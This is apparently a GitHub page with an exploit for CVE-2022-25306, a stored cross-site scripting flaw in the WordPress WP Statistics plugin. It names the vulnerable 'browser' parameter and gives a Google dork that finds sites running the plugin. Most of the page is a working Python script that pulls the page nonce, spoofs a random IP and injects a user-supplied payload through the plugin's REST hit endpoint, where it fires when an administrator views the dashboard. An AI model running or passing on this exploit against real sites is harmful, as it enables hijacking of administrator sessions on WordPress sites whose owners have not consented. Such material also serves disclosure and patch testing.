You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
/wp-content/plugins/wp-statistics/includes/class-wp-statistics-visitor.php and others
Vulnerable Parameters
browser
Google Dork
inurl:/wp-content/plugins/wp-statistics
CVE
CVE-2022-25306
Proof of Concept
importrequests, re, json, urllib.parsefromrandomimportrandintwpurl=input('\nWordPress URL: ')
payload=input('\nPayload: ')
wp_session=requests.session()
wp=wp_session.get(wpurl)
wp_nonce=re.search(r'_wpnonce=(.*?)&wp_statistics_hit', wp.text).group(1)
headers= {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15"}
payload=urllib.parse.quote_plus(payload)
random_ip='.'.join([str(randint(0,255)) forxinrange(4)])
exploit=f'/wp-json/wp-statistics/v2/hit?_=11&_wpnonce={wp_nonce}&wp_statistics_hit_rest=&browser={payload}&platform=&version=&referred=&ip={random_ip}&exclusion_match=no&exclusion_reason&ua=Something&track_all=1×tamp=11¤t_page_type=home¤t_page_id=0&search_query&page_uri=/&user_id=0'exploit_url=wpurl+exploitprint(f'\nSending XSS payload: {exploit_url}')
wp=wp_session.get(exploit_url, headers=headers)
data=wp.json()
print("\nResponse: \n"+json.dumps(data, sort_keys=True, indent=4))
print(f'\nXSS will trigger when admin visits WP Statistics Dashboard at {wpurl}/wp-admin/admin.php?page=wps_overview_page or other pages depending on the payload used.')